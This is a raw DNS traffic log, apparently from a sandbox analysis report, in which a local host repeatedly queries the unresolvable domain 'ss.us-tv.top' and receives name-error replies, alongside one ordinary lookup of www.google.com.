Nov 2, 2024 04:02:01.331068039 CET	192.168.2.14	8.8.8.8	0x946b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:01.331854105 CET	192.168.2.14	8.8.8.8	0x5101	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:02.471175909 CET	192.168.2.14	8.8.8.8	0x72d3	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:02.471350908 CET	192.168.2.14	8.8.8.8	0x4c3a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:03.607954979 CET	192.168.2.14	8.8.8.8	0x5a22	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:03.608158112 CET	192.168.2.14	8.8.8.8	0x6243	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:04.743849993 CET	192.168.2.14	8.8.8.8	0x17f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:04.744091988 CET	192.168.2.14	8.8.8.8	0xd6a9	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:05.879232883 CET	192.168.2.14	8.8.8.8	0x72a2	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:05.879479885 CET	192.168.2.14	8.8.8.8	0x5410	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:07.014983892 CET	192.168.2.14	8.8.8.8	0xf67	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:07.015053988 CET	192.168.2.14	8.8.8.8	0x3466	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:08.153928041 CET	192.168.2.14	8.8.8.8	0xea20	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:08.154824972 CET	192.168.2.14	8.8.8.8	0x2400	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:09.290505886 CET	192.168.2.14	8.8.8.8	0xbeed	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:09.290699005 CET	192.168.2.14	8.8.8.8	0xba52	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:10.429328918 CET	192.168.2.14	8.8.8.8	0xf2b7	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:10.429550886 CET	192.168.2.14	8.8.8.8	0x2b74	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:11.570827961 CET	192.168.2.14	8.8.8.8	0xae92	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:11.571274996 CET	192.168.2.14	8.8.8.8	0xc84c	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:12.711421013 CET	192.168.2.14	8.8.8.8	0x3442	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:12.711772919 CET	192.168.2.14	8.8.8.8	0x8ea9	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:13.848530054 CET	192.168.2.14	8.8.8.8	0x42ac	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:13.848761082 CET	192.168.2.14	8.8.8.8	0x2fb3	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:14.984790087 CET	192.168.2.14	8.8.8.8	0x4d73	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:14.985975981 CET	192.168.2.14	8.8.8.8	0xa19e	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:16.121254921 CET	192.168.2.14	8.8.8.8	0xdf9f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:16.121440887 CET	192.168.2.14	8.8.8.8	0x47e4	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:17.262840986 CET	192.168.2.14	8.8.8.8	0x377b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:17.263561964 CET	192.168.2.14	8.8.8.8	0x80f8	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:18.401252031 CET	192.168.2.14	8.8.8.8	0x32bd	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:18.403479099 CET	192.168.2.14	8.8.8.8	0x1fdd	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:19.541740894 CET	192.168.2.14	8.8.8.8	0xb4bf	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:19.542654991 CET	192.168.2.14	8.8.8.8	0x6cc6	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:20.678911924 CET	192.168.2.14	8.8.8.8	0x32f4	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:20.679543972 CET	192.168.2.14	8.8.8.8	0xed67	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:21.816334009 CET	192.168.2.14	8.8.8.8	0x4c59	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:21.816586018 CET	192.168.2.14	8.8.8.8	0x7652	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:22.954967976 CET	192.168.2.14	8.8.8.8	0x8f8d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:22.955491066 CET	192.168.2.14	8.8.8.8	0xdb5	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:24.092771053 CET	192.168.2.14	8.8.8.8	0x9043	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:24.093050957 CET	192.168.2.14	8.8.8.8	0x311e	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:25.231652021 CET	192.168.2.14	8.8.8.8	0x7f4a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:25.232290030 CET	192.168.2.14	8.8.8.8	0xb49f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:26.534441948 CET	192.168.2.14	8.8.8.8	0x11a9	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:26.534676075 CET	192.168.2.14	8.8.8.8	0x7624	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:27.672878027 CET	192.168.2.14	8.8.8.8	0x97cc	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:27.673883915 CET	192.168.2.14	8.8.8.8	0x3e3d	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:28.816216946 CET	192.168.2.14	8.8.8.8	0x339	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:28.816261053 CET	192.168.2.14	8.8.8.8	0x2689	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:30.434113979 CET	192.168.2.14	8.8.8.8	0xc97c	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:30.434459925 CET	192.168.2.14	8.8.8.8	0xd08	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:31.570072889 CET	192.168.2.14	8.8.8.8	0x7210	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:31.570298910 CET	192.168.2.14	8.8.8.8	0x2ad6	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:02:32.704515934 CET	192.168.2.14	8.8.8.8	0x1af1	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:02:32.704669952 CET	192.168.2.14	8.8.8.8	0x2185	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 2, 2024 04:00:38.108083010 CET	8.8.8.8	192.168.2.14	0x9902	No error (0)	www.google.com			28	IN (0x0001)	false
Nov 2, 2024 04:00:38.108083010 CET	8.8.8.8	192.168.2.14	0x9902	No error (0)	www.google.com			28	IN (0x0001)	false
Nov 2, 2024 04:00:38.108083010 CET	8.8.8.8	192.168.2.14	0x9902	No error (0)	www.google.com			28	IN (0x0001)	false
Nov 2, 2024 04:00:38.108083010 CET	8.8.8.8	192.168.2.14	0x9902	No error (0)	www.google.com			28	IN (0x0001)	false
Nov 2, 2024 04:00:38.116391897 CET	8.8.8.8	192.168.2.14	0xe85c	No error (0)	www.google.com		142.251.116.105	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:38.116391897 CET	8.8.8.8	192.168.2.14	0xe85c	No error (0)	www.google.com		142.251.116.104	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:38.116391897 CET	8.8.8.8	192.168.2.14	0xe85c	No error (0)	www.google.com		142.251.116.99	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:38.116391897 CET	8.8.8.8	192.168.2.14	0xe85c	No error (0)	www.google.com		142.251.116.103	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:38.116391897 CET	8.8.8.8	192.168.2.14	0xe85c	No error (0)	www.google.com		142.251.116.147	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:38.116391897 CET	8.8.8.8	192.168.2.14	0xe85c	No error (0)	www.google.com		142.251.116.106	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:38.268630981 CET	8.8.8.8	192.168.2.14	0x3deb	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:00:38.268646955 CET	8.8.8.8	192.168.2.14	0x78ac	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:39.403500080 CET	8.8.8.8	192.168.2.14	0x1503	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:00:39.616489887 CET	8.8.8.8	192.168.2.14	0xd89	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:40.751677036 CET	8.8.8.8	192.168.2.14	0x469c	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:00:41.892328024 CET	8.8.8.8	192.168.2.14	0x3f18	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:00:41.892736912 CET	8.8.8.8	192.168.2.14	0xdac1	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:43.028337955 CET	8.8.8.8	192.168.2.14	0x80ac	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:00:44.166974068 CET	8.8.8.8	192.168.2.14	0xb984	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:00:45.303093910 CET	8.8.8.8	192.168.2.14	0x7bf5	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:46.437076092 CET	8.8.8.8	192.168.2.14	0xf682	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:46.728080034 CET	8.8.8.8	192.168.2.14	0x1281	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:00:47.862997055 CET	8.8.8.8	192.168.2.14	0x97e5	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:48.998265028 CET	8.8.8.8	192.168.2.14	0xa77c	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:48.998311043 CET	8.8.8.8	192.168.2.14	0xdcf1	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:00:50.135689974 CET	8.8.8.8	192.168.2.14	0x452b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:00:50.135729074 CET	8.8.8.8	192.168.2.14	0xa1f6	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:51.272775888 CET	8.8.8.8	192.168.2.14	0xa518	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:00:51.274573088 CET	8.8.8.8	192.168.2.14	0x7d1e	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:52.409753084 CET	8.8.8.8	192.168.2.14	0x2d7f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:00:52.409805059 CET	8.8.8.8	192.168.2.14	0x817b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:53.545243025 CET	8.8.8.8	192.168.2.14	0xb513	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:00:53.545396090 CET	8.8.8.8	192.168.2.14	0x69c8	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:54.684106112 CET	8.8.8.8	192.168.2.14	0x979b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:00:54.685323000 CET	8.8.8.8	192.168.2.14	0xe84f	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:55.825119019 CET	8.8.8.8	192.168.2.14	0xe992	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:00:56.961323977 CET	8.8.8.8	192.168.2.14	0xc671	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:58.099843979 CET	8.8.8.8	192.168.2.14	0x192d	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:00:58.099858046 CET	8.8.8.8	192.168.2.14	0x85d3	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:00:59.239089966 CET	8.8.8.8	192.168.2.14	0xf39f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:00:59.239183903 CET	8.8.8.8	192.168.2.14	0xabd2	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:00.374859095 CET	8.8.8.8	192.168.2.14	0x7421	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:00.374876022 CET	8.8.8.8	192.168.2.14	0xadbd	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:01.513859034 CET	8.8.8.8	192.168.2.14	0x6444	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:01.513875961 CET	8.8.8.8	192.168.2.14	0x989f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:02.651937962 CET	8.8.8.8	192.168.2.14	0xa5a3	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:02.652398109 CET	8.8.8.8	192.168.2.14	0x87d	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:03.788971901 CET	8.8.8.8	192.168.2.14	0xe8d	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:03.788979053 CET	8.8.8.8	192.168.2.14	0x8f36	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:04.926246881 CET	8.8.8.8	192.168.2.14	0x3f6f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:06.062551975 CET	8.8.8.8	192.168.2.14	0x8cb3	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:07.197307110 CET	8.8.8.8	192.168.2.14	0xd5	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:08.332613945 CET	8.8.8.8	192.168.2.14	0x4d6f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:09.468859911 CET	8.8.8.8	192.168.2.14	0x84ca	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:10.614753008 CET	8.8.8.8	192.168.2.14	0xfed9	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:10.614767075 CET	8.8.8.8	192.168.2.14	0xc88d	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:11.752557039 CET	8.8.8.8	192.168.2.14	0x3393	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:11.752707958 CET	8.8.8.8	192.168.2.14	0xca3c	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:12.888523102 CET	8.8.8.8	192.168.2.14	0x47fe	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:12.889204025 CET	8.8.8.8	192.168.2.14	0xf37b	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:14.511070013 CET	8.8.8.8	192.168.2.14	0xab24	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:14.516280890 CET	8.8.8.8	192.168.2.14	0xffb8	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:15.656006098 CET	8.8.8.8	192.168.2.14	0x333f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:15.656044960 CET	8.8.8.8	192.168.2.14	0xc907	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:16.794708967 CET	8.8.8.8	192.168.2.14	0xab61	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:16.794783115 CET	8.8.8.8	192.168.2.14	0x23a1	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:17.935583115 CET	8.8.8.8	192.168.2.14	0x1675	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:17.935600996 CET	8.8.8.8	192.168.2.14	0xd572	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:19.082549095 CET	8.8.8.8	192.168.2.14	0xdc25	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:19.292757034 CET	8.8.8.8	192.168.2.14	0x9674	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:20.430886030 CET	8.8.8.8	192.168.2.14	0x16a8	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:20.432157040 CET	8.8.8.8	192.168.2.14	0x54a3	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:21.569401979 CET	8.8.8.8	192.168.2.14	0x2909	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:21.569593906 CET	8.8.8.8	192.168.2.14	0x4a35	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:22.709606886 CET	8.8.8.8	192.168.2.14	0x540a	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:22.709719896 CET	8.8.8.8	192.168.2.14	0x54c5	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:23.848697901 CET	8.8.8.8	192.168.2.14	0xbc8b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:24.988990068 CET	8.8.8.8	192.168.2.14	0x9241	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:24.990205050 CET	8.8.8.8	192.168.2.14	0x3afd	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:26.131078959 CET	8.8.8.8	192.168.2.14	0x433d	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:26.131179094 CET	8.8.8.8	192.168.2.14	0xcd4e	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:27.274579048 CET	8.8.8.8	192.168.2.14	0xbae9	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:27.275887966 CET	8.8.8.8	192.168.2.14	0x84c8	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:28.419398069 CET	8.8.8.8	192.168.2.14	0x3a7e	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:28.419416904 CET	8.8.8.8	192.168.2.14	0x5d6e	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:29.557589054 CET	8.8.8.8	192.168.2.14	0x372a	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:30.696787119 CET	8.8.8.8	192.168.2.14	0xb822	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:30.696809053 CET	8.8.8.8	192.168.2.14	0xb640	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:31.834140062 CET	8.8.8.8	192.168.2.14	0xcbf7	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:31.834156036 CET	8.8.8.8	192.168.2.14	0xccdc	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:32.970031977 CET	8.8.8.8	192.168.2.14	0x8228	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:32.970057011 CET	8.8.8.8	192.168.2.14	0x4e7e	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:34.108175993 CET	8.8.8.8	192.168.2.14	0xaa2	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:34.109184980 CET	8.8.8.8	192.168.2.14	0x7df3	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:35.250823021 CET	8.8.8.8	192.168.2.14	0xb3e4	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:35.250837088 CET	8.8.8.8	192.168.2.14	0x5553	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:36.392046928 CET	8.8.8.8	192.168.2.14	0xcd13	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:36.393955946 CET	8.8.8.8	192.168.2.14	0xe752	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:37.534313917 CET	8.8.8.8	192.168.2.14	0x728b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:38.001293898 CET	8.8.8.8	192.168.2.14	0xb3ad	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:39.138890982 CET	8.8.8.8	192.168.2.14	0xce75	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:39.138902903 CET	8.8.8.8	192.168.2.14	0x9273	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:40.279294014 CET	8.8.8.8	192.168.2.14	0xf706	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:40.281145096 CET	8.8.8.8	192.168.2.14	0x3178	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:41.419142008 CET	8.8.8.8	192.168.2.14	0xe604	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:42.556165934 CET	8.8.8.8	192.168.2.14	0x8a5f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:43.696048975 CET	8.8.8.8	192.168.2.14	0x10d3	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:43.696146011 CET	8.8.8.8	192.168.2.14	0xbcb0	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:44.835591078 CET	8.8.8.8	192.168.2.14	0x6d62	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:44.835772038 CET	8.8.8.8	192.168.2.14	0xbba5	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:45.972666979 CET	8.8.8.8	192.168.2.14	0x75a4	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:45.972824097 CET	8.8.8.8	192.168.2.14	0x7e6a	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:47.107358932 CET	8.8.8.8	192.168.2.14	0xd6a0	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:47.107687950 CET	8.8.8.8	192.168.2.14	0xb590	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:48.244293928 CET	8.8.8.8	192.168.2.14	0x65cb	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:48.244410992 CET	8.8.8.8	192.168.2.14	0x8f5d	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:49.380858898 CET	8.8.8.8	192.168.2.14	0xd4ca	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:50.517347097 CET	8.8.8.8	192.168.2.14	0x5ab	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:50.517600060 CET	8.8.8.8	192.168.2.14	0x3033	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:52.147279024 CET	8.8.8.8	192.168.2.14	0xf04b	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:53.285083055 CET	8.8.8.8	192.168.2.14	0x84ec	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:53.285137892 CET	8.8.8.8	192.168.2.14	0x3474	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:54.425256968 CET	8.8.8.8	192.168.2.14	0x9947	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:54.425333977 CET	8.8.8.8	192.168.2.14	0x3fe3	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:55.563379049 CET	8.8.8.8	192.168.2.14	0x8312	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:55.563704967 CET	8.8.8.8	192.168.2.14	0x9e28	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:56.698791981 CET	8.8.8.8	192.168.2.14	0xf8e9	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:57.838073015 CET	8.8.8.8	192.168.2.14	0xd3d8	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
Nov 2, 2024 04:01:57.838238955 CET	8.8.8.8	192.168.2.14	0xfdc8	Name error (3)	ss.us-tv.top	none	none	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:01:58.976593018 CET	8.8.8.8	192.168.2.14	0x198f	Name error (3)	ss.us-tv.top	none	none	28	IN (0x0001)	false
